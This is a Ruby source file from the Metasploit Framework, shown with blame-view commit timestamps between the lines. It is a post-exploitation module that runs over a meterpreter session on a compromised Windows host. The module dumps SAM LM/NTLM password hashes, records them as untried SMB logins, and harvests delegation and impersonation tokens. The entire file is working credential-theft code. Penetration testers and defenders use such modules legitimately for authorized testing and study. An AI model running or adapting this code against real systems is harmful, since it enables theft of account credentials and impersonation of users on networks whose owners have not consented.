metasploit-framework/modules/post/windows/gather/credentials/credential_collector.rb

104 lines
3.0 KiB
Ruby
Raw Normal View History

##
2013-10-15 19:52:12 +00:00
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
2012-10-23 18:24:05 +00:00
require 'msf/core/auxiliary/report'
class Metasploit3 < Msf::Post
2013-09-05 18:41:25 +00:00
include Msf::Auxiliary::Report
2013-09-05 18:41:25 +00:00
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Gather Credential Collector',
'Description' => %q{ This module harvests credentials found on the host and stores them in the database.},
'License' => MSF_LICENSE,
'Author' => [ 'tebo[at]attackresearch.com'],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter']
))
2013-09-05 18:41:25 +00:00
end
2013-09-05 18:41:25 +00:00
# Run Method for when run command is issued
def run
print_status("Running module against #{sysinfo['Computer']}")
# Collect even without a database to store them.
if session.framework.db.active
db_ok = true
else
db_ok = false
end
2013-09-05 18:41:25 +00:00
# Make sure we're rockin Priv and Incognito
session.core.use("priv") if not session.priv
session.core.use("incognito") if not session.incognito
2013-09-05 18:41:25 +00:00
# It wasn't me mom! Stinko did it!
hashes = client.priv.sam_hashes
2013-09-05 18:41:25 +00:00
# Target infos for the db record
addr = client.sock.peerhost
# client.framework.db.report_host(:host => addr, :state => Msf::HostState::Alive)
2013-09-05 18:41:25 +00:00
# Record hashes to the running db instance
print_good "Collecting hashes..."
2013-09-05 18:41:25 +00:00
hashes.each do |hash|
2014-08-23 15:53:55 +00:00
# Build service information
service_data = {
address: addr,
port: 445,
service_name: 'smb',
protocol: 'tcp',
}
# Build credential information
credential_data = {
origin_type: :session,
post_reference_name: self.fullname,
private_type: :ntlm_hash,
private_data: hash.lanman + ":" + hash.ntlm,
username: hash.user_name,
workspace_id: myworkspace_id
}
credential_data[:session_id] = session.db_record.id if !session.db_record.nil?
credential_data.merge!(service_data)
credential_core = create_credential(credential_data)
# Assemble the options hash for creating the Metasploit::Credential::Login object
login_data = {
core: credential_core,
status: Metasploit::Model::Login::Status::UNTRIED,
workspace_id: myworkspace_id
}
login_data.merge!(service_data)
create_credential_login(login_data)
print_line " Extracted: #{credential_data[:username]}:#{credential_data[:private_data]}"
2013-09-05 18:41:25 +00:00
end
2013-09-05 18:41:25 +00:00
# Record user tokens
tokens = session.incognito.incognito_list_tokens(0)
raise Rex::Script::Completed if not tokens
2013-09-05 18:41:25 +00:00
# Meh, tokens come to us as a formatted string
print_good "Collecting tokens..."
(tokens["delegation"] + tokens["impersonation"]).split("\n").each do |token|
data = {}
data[:host] = addr
data[:type] = 'smb_token'
data[:data] = token
data[:update] = :unique_data
2013-09-05 18:41:25 +00:00
print_line " #{data[:data]}"
report_note(data) if db_ok
end
end
end